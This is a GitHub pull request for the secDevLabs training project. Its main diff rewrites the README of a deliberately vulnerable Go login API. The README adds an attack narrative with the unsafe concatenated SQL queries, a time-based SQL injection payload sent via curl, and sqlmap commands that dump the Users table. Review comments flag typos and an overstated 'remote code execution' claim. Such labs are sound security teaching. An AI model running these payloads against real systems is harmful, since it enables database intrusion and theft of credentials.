Update A1 - Copy-n-Paste README #165

Merged
merged 69 commits into from
May 21, 2019
Changes from 66 commits
69 commits
24b6dc0
[DOCS] Add attack into README
rafaveira3 Feb 10, 2019
86b6a54
[DOCS] Add index
vitoriario Feb 11, 2019
115681b
[FIX] Fix objectives link
vitoriario Feb 11, 2019
11144e2
[DOCS] Move attack pictures to images folder
vitoriario Feb 11, 2019
437d813
[DOCS] correct misspelling
vitoriario Feb 11, 2019
bc594a4
[FEAT] Redirect / to /login
vitoriario Feb 26, 2019
99789e0
Merge pull request #202 from vitoriario/redirect_login
rafaveira3 Feb 26, 2019
1d4046a
[FEAT] WIP: Add new A9 app Stegonography
Krlier Mar 17, 2019
f5712cf
Fix typo in README.md
Krlier Apr 1, 2019
b47041a
Merge branch 'master' of github.com:globocom/secDevLabs into Stegonog…
Krlier Apr 14, 2019
3cc941d
[FEAT] Stegonography first commit 🚀
Krlier Apr 14, 2019
076531c
[FEAT] Add README file
Krlier Apr 19, 2019
50f8045
[FEAT] Add attack narrative images
Krlier Apr 19, 2019
1bbbf50
[FEAT] Add admin's page
Krlier Apr 19, 2019
ff7d5dc
[FEAT] Change session token name
Krlier Apr 19, 2019
d48adbc
[REFACT] Change Stegonography from A9 to A6
Krlier Apr 19, 2019
5981d08
[FEAT] Update README.md
Krlier Apr 19, 2019
9db240c
[REFACT] Update README.md
Krlier Apr 23, 2019
ea40d63
Merge branch 'Stegonography' of github.com:globocom/secDevLabs into S…
Krlier Apr 23, 2019
8337eec
[REFACT] Move node_modules to app folder
Krlier May 2, 2019
1e51f73
[FEAT] Add dependencies to node_modules
Krlier May 2, 2019
bb5b6f5
[REFACT] Add mongodb to hold credentials
Krlier May 2, 2019
975786d
[DOCS] Update README file
Krlier May 2, 2019
93379f9
[FEAT] Add new routes
Krlier May 2, 2019
141f945
[FEAT] Update dependencies
Krlier May 2, 2019
a2ff06f
[DOCS] Update README
Krlier May 2, 2019
fb34c8a
[FIX] Logout route now clears cookie correctly
Krlier May 2, 2019
0d6e56b
Merge pull request #226 from globocom/Stegonography
spimpaov May 2, 2019
99757b4
[DOCS] Update README with new A6 app
Krlier May 2, 2019
46fee5d
Merge pull request #227 from globocom/Update-Readme
spimpaov May 2, 2019
00d71b5
[DOCS] Update README to have the Attack Narrative
Krlier May 9, 2019
be533c1
[DOCS] Remove ATTACK.md and move its images
Krlier May 9, 2019
f4da66a
[DOCS] Update README to contemplate the Attack Narrative
Krlier May 9, 2019
c6b51af
[DOCS] Remove docs folder and move its images
Krlier May 9, 2019
7fd573e
[DOCS] Update README file to contemplate the Attack Narrative
Krlier May 9, 2019
ee0284d
[DOCS] Remove docs folder and move its images
Krlier May 9, 2019
5f55be7
[DOCS] Update README to contemplate the Attack Narrative
Krlier May 9, 2019
43c4397
[DOCS] Remove docs folder and move its images
Krlier May 9, 2019
0ca0519
[DOCS] Remove docs folder
Krlier May 9, 2019
0570df9
[FEAT] Add verbose response to successful login route
May 9, 2019
07de238
Merge pull request #233 from Takehime/a2-feat
Krlier May 9, 2019
0547d70
[DOCS] Update README file to contemplate the Attack Narrative
Krlier May 9, 2019
4916bc5
[DOCS] Remove the docs folder and move its images
Krlier May 9, 2019
9cd95d1
Merge pull request #232 from globocom/A4-VinijrBlog-Update-Readme
spimpaov May 9, 2019
1e59c29
Merge pull request #229 from globocom/A2-Saidajaula-Update-README
spimpaov May 9, 2019
a0698da
Merge pull request #230 from globocom/A2-InsecureGoProject-Update-Readme
spimpaov May 9, 2019
65d630c
Merge pull request #231 from globocom/A3-SnakePro-Update-Readme
spimpaov May 9, 2019
aab1552
Merge pull request #234 from globocom/A5-EcommerceAPI-Update-Readme
spimpaov May 9, 2019
d2a22ac
[DOCS] Fix Objectives link
spimpaov May 13, 2019
f3f48d3
[DOCS] Fix Objectives link
spimpaov May 13, 2019
7e657d1
[DOCS] Fix Objectives link
spimpaov May 13, 2019
36d689d
[DOCS] Fix Objectives link
spimpaov May 13, 2019
0932cec
[DOCS] Fix Objectives link
spimpaov May 13, 2019
50415ab
[DOCS] Update A3 README
spimpaov May 13, 2019
457b093
[DOCS] Fix broken link in A4 README
spimpaov May 13, 2019
39e9f65
Merge pull request #241 from globocom/fix-objectives
Krlier May 14, 2019
174c79d
[DOCS] Update README.md "objectives" link
Krlier May 14, 2019
c07b46f
Merge pull request #242 from globocom/fix-obj-a3
Krlier May 14, 2019
09f710c
Merge pull request #243 from globocom/fix-obj-a2
Krlier May 14, 2019
31ed41b
Merge pull request #244 from globocom/fix-obj-a4
Krlier May 14, 2019
1d77fee
Merge pull request #245 from globocom/fix-obj-a5
Krlier May 14, 2019
6ed317b
Merge pull request #246 from globocom/readme-a3
Krlier May 14, 2019
67a2030
Merge pull request #247 from globocom/readme-a4
Krlier May 14, 2019
b59689f
[DOCS] Remove docs folder
Krlier May 14, 2019
011c117
Merge branch 'change-a1-docs' of github.com:globocom/secDevLabs into …
Krlier May 14, 2019
c387924
[DOCS] Update README with A1 final version
Krlier May 14, 2019
43ce9ce
[DOCS] Fix typo in Readme
spimpaov May 20, 2019
31b0bed
[DOCS] Add payload in A1 Readme
spimpaov May 20, 2019
0ca3fdf
[DOCS] Fix typo
Krlier May 21, 2019
3 changes: 2 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -18,7 +18,7 @@ Now it's time to shield the application up! Imagine that this is your applicatio

## How secure is my new code?

After mitigating a vulnerability, you can send a Pull Request using to gently ask secDevLabs community to review your new secure code. If you're feeling a bit lost, try having a look at [this mitigation solution](https://github.com/globocom/secDevLabs/pull/29), it might help! 🚀
After mitigating a vulnerability, you can send a Pull Request to gently ask secDevLabs community to review your new secure code. If you're feeling a bit lost, try having a look at [this mitigation solution](https://github.com/globocom/secDevLabs/pull/29), it might help! 🚀

## OWASP Top 10 (2017) apps:

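Review bot: with "using" dropped, the sentence still lacks an article before the project name ("ask secDevLabs community"); suggest "to gently ask the secDevLabs community to review your new secure code".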
@@ -33,6 +33,7 @@ Disclaimer: You are about to install vulnerable apps in your machine! 🔥
| A4 - XML External Entities (XXE) | PHP | [ViniJr Blog](owasp-top10-2017-apps/a4/vinijr-blog) |
| A5 - Broken Access Control | Golang | [Vulnerable Ecommerce API](owasp-top10-2017-apps/a5/ecommerce-api) |
| A6 - Security Misconfiguration | PHP | [Vulnerable Wordpress Misconfig](owasp-top10-2017-apps/a6/misconfig-wordpress) |
| A6 - Security Misconfiguration | NodeJS | [Stegonography](owasp-top10-2017-apps/a6/stegonography) |
| A7 - Cross-Site Scripting (XSS) | Python | [Gossip World](owasp-top10-2017-apps/a7/gossip-world) |
| A8 - Insecure Deserialization | Python | [Amarelo Designs](owasp-top10-2017-apps/a8/amarelo-designs) |
| A9 - Using Components With Known Vulnerabilities | PHP | [Cimentech](owasp-top10-2017-apps/a9/cimentech) |
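Review bot: the new A6 row spells the app "Stegonography" and links to `a6/stegonography`, while the term is "steganography". If the directory name is being kept as-is, the display name in the table should still be spelled correctly; otherwise rename both together so the link target and the name agree.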
156 changes: 141 additions & 15 deletions owasp-top10-2017-apps/a1/copy-n-paste/README.md
Original file line number Diff line number Diff line change
@@ -1,40 +1,166 @@
# CopyNPaste API
> This is a simple Golang API that contains an example of an Injection vulnerability.

<img src="images/CopyNPaste.png" align="center"/>

## What is Injection?
CopyNPaste is Golang web application that uses an API and a simple front end to simulate a login page. It has both `/register` and `/login` routes that, by communicating with a MySQL database, enables users register and enter into a generic system.

## Index

Definition from [OWASP](https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf):
- [Definition](#what-is-injection)
- [Setup](#setup)
- [Attack narrative](#attack-narrative)
- [Objectives](#secure-this-app)
- [Solutions](#pr-solutions)
- [Contributing](#contributing)

## What is Injection?

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

## Requirements
The main goal of this project is to discuss how **SQL Injection** vulnerabilities can be exploited and to encourage developers send Pull Requests to secDevLabs on how they would mitigate these flaws.

## Setup

To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:

```sh
cd secDevLabs/owasp-top10-2017-apps/a1/copy-n-paste
```

```sh
make install
```

To build this lab you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install].
Then simply visit [localhost:3000][App], as exemplified below:

<img src="images/CopyNPaste.png" align="center"/>

## Deploy and Run
## Get to know the app 💉

After cloning this repository, you can type the following command to start the vulnerable application:
To properly understand how this application works, you can follow these simple steps:

- Register a new user via front-end.
- Login as this user via front-end.
* Register another user now using command line:
```sh
$ make install
curl -s -H "Content-Type: application/json" -d '{"user":"bob", "pass":"password", "passcheck":"password"}' http://localhost:3000/register
```
* Login as this second user now using command line:
```sh
curl -s -H "Content-Type: application/json" -d '{"user":"bob", "pass":"password"}' http://localhost:3000/login

```

## Attack narrative

Now that you know the purpose of this app, what could possibly go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or it's users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜

### 👀

#### Lack of input validation allows for remote code execution

After reviewing `NewUser()` , `CheckIfUserExists()` and `AuthenticateUser()` from [`db.go`]((https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2017-apps/a1/copy-n-paste/app/util/db.go#)) file, it was possible to see that some input from users are concatenated with SQL queries, as shown in the following code snippets:

```go
query := fmt.Sprint("select * from Users where username = '" + user + "'")

```

```go
query := fmt.Sprint("insert into Users (username, password) values ('" + user + "', '" + passHash + "')")
```

```go
query := fmt.Sprint("select username from Users where username = '" + username + "'")
```

As no validation is being made on these variables, SQL injections may be successfully executed in the database. Using the web interface, we can send some information, using the form from "inspect page", to better understand how it communicates with the API.

<img src="images/attack-0.png" align="center"/>

To confirm the input field is vulnerable, the following payload could be used to test if a 5 seconds delay will be noted after sending it:

<img src="images/attack-1.png" align="center"/>

Using `curl` on CLI interface, we can test it again, this time with a larger 30 seconds delay:

```sh
curl -s -H "Content-Type: application/json" -d '{"user":"-1'\'' union select 1,2,sleep(30) -- ", "pass":"password"}' http://127.0.0.1:3000/login
```

Request:

<img src="images/attack-2.png" align="center"/>

30 seconds later, thus confirming we can execute commands on the server:

<img src="images/attack-3.png" align="center"/>

#### 🔥

An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For the purpose of this attack narrative, [sqlmap](https://github.com/sqlmapproject/sqlmap) will be used to exemplify how an automated SQL Injection attack may be performed.

To install sqlmap on a Mac you can simply type:

```sh
brew install sqlmap
```

The first possible step is to create a file, `postRequest.txt`, containing the HTTP POST itself, as shown in the following code:

```sh
POST /login HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: curl/7.54.0
Accept: */*
Content-Type: application/json
Content-Length: 31

{"user":"user", "pass":"password"}
```

Before executing the attack, you can open a new tab in your terminal and type the following command to observe how the malicious requests will be received by the app:

```sh
docker logs a1_api -f
```

After that, we can now use `-r` option and wait for sqlmap to perform multiples malicious requests until it finds the vulnerable parameter:

```sh
sqlmap -r postRequest.txt
```

<img src="images/attack-4.png" align="center"/>

After understanding how this database is structured, an attacker could use the following command to retrieve database details:

```sh
sqlmap -r postRequest.txt --tables
```

And then retrieve sensitive information from it:

```sh
sqlmap -r postRequest.txt -D a1db -T Users --dump
```

<img src="images/attack-5.png" align="center"/>

Then simply visit [localhost:3000][App] !
## Secure this app

## Attack Narrative
How could you now migitate this vulnerability? After your code modification, an attacker should not be able to:

To understand how this vulnerability can be exploited, check [this section](docs/ATTACK.md)!
* Run SQL queries in the database.

## Mitigating the vulnerability
## PR solutions

(Spoiler alert 🧐) To understand how this vulnerability can be mitigated, check [this other section](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22CopyNPaste+API%22)!
[Spoiler alert] To understand how this vulnerability can be mitigated, check [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22CopyNPaste+API%22)!

## Contributing

Yes, please. :zap:
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉

[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
[App]: http://127.0.0.1:3000
[App]: http://localhost:3000
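Review bot: the heading "Lack of input validation allows for remote code execution" and the line "30 seconds later, thus confirming we can execute commands on the server" overstate what the narrative actually shows: the `sleep(30)` payload demonstrates a time-based SQL injection executed by the MySQL database, not command execution on the API host. Suggest "allows for SQL injection" and "confirming we can run arbitrary SQL against the database", which also matches the stated objective "Run SQL queries in the database". Smaller points in the same hunk: the `db.go` link is written as `[`db.go`]((https://...#))` with doubled parentheses and a trailing `#` and will not render as a link; `Content-Length: 31` in `postRequest.txt` does not match the 34-byte body `{"user":"user", "pass":"password"}` (sqlmap may tolerate it, but the sample request should be consistent), and that block is an HTTP request rather than `sh`; the "Get to know the app" list mixes `-` and `*` bullets; and a few typos: "migitate" should be "mitigate", "it's users" should be "its users", "CopyNPaste is Golang web application ... enables users register" should be "is a Golang web application ... enables users to register", and "encourage developers send Pull Requests" should be "to send".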
95 changes: 0 additions & 95 deletions owasp-top10-2017-apps/a1/copy-n-paste/docs/ATTACK.md

This file was deleted.
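Review bot: deleting `docs/ATTACK.md` is consistent with the narrative now living in the app README and with the old Index link to `docs/ATTACK.md` being dropped in that file; since the diff cannot show inbound links, please confirm no other page in the repository still points at that path before merging.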